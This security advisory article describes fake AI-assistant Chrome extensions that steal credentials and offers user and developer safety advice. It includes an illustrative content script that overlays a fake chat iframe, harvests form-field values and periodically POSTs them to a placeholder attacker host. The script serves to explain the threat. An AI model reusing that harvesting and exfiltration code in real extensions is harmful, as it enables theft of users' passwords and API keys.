Chrome Blocks Malicious AI Assistant Extensions

A wave of fake AI‑assistant extensions has flooded the Chrome Web Store, stealing passwords, API keys, and email content from more than 260,000 users. These add‑ons masquerade as popular AI tools, promise quick replies, and then silently exfiltrate data to remote servers. If you’ve installed any unknown AI extension, you should act now.

How the Fake AI Extensions Operate

Attackers publish extensions that claim to offer ChatGPT‑style chat, email drafting, or document summarisation. Once you add one, it injects a full‑screen iframe that looks like a legitimate AI interface while it reads the active tab, captures text, and sends credentials back to a command‑and‑control server.
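
In simplified form, the pattern looks something like the content script below. This is an illustrative sketch rather than code from any specific sample; the domains, endpoint, and exfiltration interval are hypothetical.

```typescript
// content-script.ts — illustrative sketch of the injection pattern
// described above, not code from any real sample. Domains, endpoint,
// and interval are hypothetical.

// 1. Cover the page with a full-screen iframe that mimics an AI chat UI.
//    Because the payload is loaded remotely, it can change server-side
//    without any update to the extension package itself.
const frame = document.createElement("iframe");
frame.src = "https://attacker.example/fake-chat";
frame.style.cssText =
  "position:fixed;inset:0;width:100vw;height:100vh;border:0;z-index:2147483647;";
document.documentElement.appendChild(frame);

// 2. Meanwhile, read the real page underneath: anything typed into
//    form fields, including credentials.
function harvest(): void {
  const fields = Array.from(
    document.querySelectorAll<HTMLInputElement | HTMLTextAreaElement>(
      "input, textarea",
    ),
  ).map((el) => ({ name: el.name, value: el.value }));

  // 3. Ship the capture to the command-and-control server.
  void fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ url: location.href, fields }),
  });
}
setInterval(harvest, 30_000); // periodic exfiltration
```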

Extension Spraying Tactics

When Google removes a malicious add‑on, the criminals simply re‑publish a copy under a new ID. This “extension spraying” lets the threat stay alive even after takedowns, because each new version shares the same codebase and points to the same malicious domain.

Data Harvesting Mechanics

These extensions request the “read and change all your data on the websites you visit” permission, a warning most users accept without a second thought. With that access, the injected script extracts authentication tokens, Gmail credentials, and API keys, shipping them to the attacker’s server for later abuse.
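
Chrome shows that warning whenever an extension requests host access to every site. A Manifest V3 fragment along these lines would trigger it; it is shown here as an annotated TypeScript object, since real manifests are plain JSON and cannot carry comments, and the extension name is hypothetical:

```typescript
// A Manifest V3 fragment shown as an annotated TypeScript object
// (real manifests are plain JSON). The name is hypothetical; the key
// detail is the "<all_urls>" match pattern.
const manifest = {
  manifest_version: 3,
  name: "Hypothetical AI Quick-Reply Helper",
  version: "1.0.0",
  content_scripts: [
    {
      // Matching every site is what makes Chrome display the
      // "Read and change all your data on the websites you visit" warning.
      matches: ["<all_urls>"],
      js: ["content-script.js"],
    },
  ],
} as const;
```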

Impact on Users and Organisations

Stolen API keys can generate massive cloud bills, while compromised email accounts open the door to business‑email‑compromise attacks. In worst‑case scenarios, attackers leverage those credentials to infiltrate corporate networks, giving them a foothold for further exploitation.

What You Can Do to Stay Safe

  • Treat any extension that asks for “read and change all your data” with suspicion.
  • Verify the publisher’s identity; official OpenAI, Google, or Anthropic extensions appear under verified developer accounts.
  • Regularly audit installed extensions via chrome://extensions and remove anything you don’t recognise (a scripted version of this check is sketched just after this list).
  • After removal, clear your browser’s cookies and site data, and rotate any passwords or API keys the extension could have captured; removing the add‑on alone does not revoke stolen credentials.
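
For readers who prefer to automate the audit step, the sketch below flags installed extensions with broad host access. It assumes it runs inside an extension that holds the “management” permission, since the chrome.management API is not exposed to ordinary web pages, and that @types/chrome is installed for the chrome global.

```typescript
// audit-extensions.ts — a minimal permission-audit sketch. Assumes it
// runs inside an extension holding the "management" permission.

const BROAD_PATTERNS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

async function flagBroadExtensions(): Promise<void> {
  const installed = await chrome.management.getAll();
  for (const ext of installed) {
    // Skip themes/apps and anything already disabled.
    if (ext.type !== "extension" || !ext.enabled) continue;
    const hosts = ext.hostPermissions ?? [];
    if (hosts.some((h) => BROAD_PATTERNS.includes(h))) {
      // Anything flagged here can read and change data on every site.
      console.warn(`Review ${ext.name} (${ext.id}): broad host access`);
    }
  }
}

void flagBroadExtensions();
```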

Expert Insight on AI‑Powered Threats

“We’ve seen a spike in credential‑theft campaigns that piggy‑back on the hype around AI,” says Maya Patel, senior threat analyst at a Fortune 500 security operations centre. “What makes this threat dangerous is its use of an iframe to load remote code. That means the malicious payload can evolve without any update to the extension itself, slipping past traditional static analysis.”

Patel adds, “If you’re building a legitimate AI extension, publish under a verified Google account, limit permissions to the minimum needed, and provide a clear privacy policy. Users are more likely to trust an extension that explains why it needs access to a particular site.”
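
As a rough illustration of that least‑privilege advice, a legitimate extension might restrict itself to activeTab and request broader host access only at runtime. The fragment below is a sketch, again shown as an annotated TypeScript object, with a placeholder name and host pattern rather than a template from any official vendor:

```typescript
// A contrasting least-privilege Manifest V3 fragment (annotated
// TypeScript object; real manifests are plain JSON). Name and host
// pattern are hypothetical placeholders.
const manifest = {
  manifest_version: 3,
  name: "Hypothetical AI Drafting Helper",
  version: "1.0.0",
  // activeTab grants temporary access only to the tab the user
  // explicitly invokes the extension on, so the broad
  // "read and change all your data" warning never appears at install.
  permissions: ["activeTab"],
  // Wider host access is requested at runtime, with an explanation,
  // only when the user enables the feature that needs it.
  optional_host_permissions: ["https://mail.google.com/*"],
} as const;
```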